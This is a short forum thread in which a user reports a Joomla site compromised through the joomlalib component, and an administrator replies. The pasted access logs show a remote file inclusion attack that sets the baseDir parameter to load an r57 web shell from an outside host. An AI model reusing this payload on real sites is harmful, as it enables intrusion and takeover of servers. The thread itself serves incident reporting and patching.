Results 1 to 3 of 3

Thread: Joomlalib hacked

  1. 10-09-2007 11:41 AM #1
    dracula
    dracula is offline Active Member
    Join Date
    May 2007
    Posts
    16

    Default Joomlalib hacked

    The site of a friend of mine was hacked recently through joomlalib 1.3.1beta, but what I see in the actual joomlalib could have the same problem!
    Code:
    ($baseDir = dirname(__FILE__) . '/';)
    ....
    Here is what I found in the accesslog

    Code:
    203.151.217.29 - - [09/Oct/2007:02:56:45 +0200] "GET //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:56:58 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 15193 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:57:21 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 15256 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:58:17 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12083 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:58:30 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12083 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:58:44 +0200] "GET / HTTP/1.0" 200 1776 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    Last edited by dracula; 10-09-2007 at 11:45 AM.
  2. 10-09-2007 02:00 PM #2
    michiel_1981
    michiel_1981 is offline Administrator
    Join Date
    May 2006
    Location
    Nijmegen, The Netherlands
    Posts
    1,003

    Default Re: Joomlalib hacked

    please post the complete code and not just that line, so I can compare it against the current and/or see if there indeed a security issue.

    kind regards,
    Michiel
    Michiel Bijland | Django
  3. 10-09-2007 03:45 PM #3
    dracula
    dracula is offline Active Member
    Join Date
    May 2007
    Posts
    16

    Default Re: Joomlalib hacked

    I think this was solved. There was a post on the joomla forum.
    So the new version should be safe again.
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Forum Rules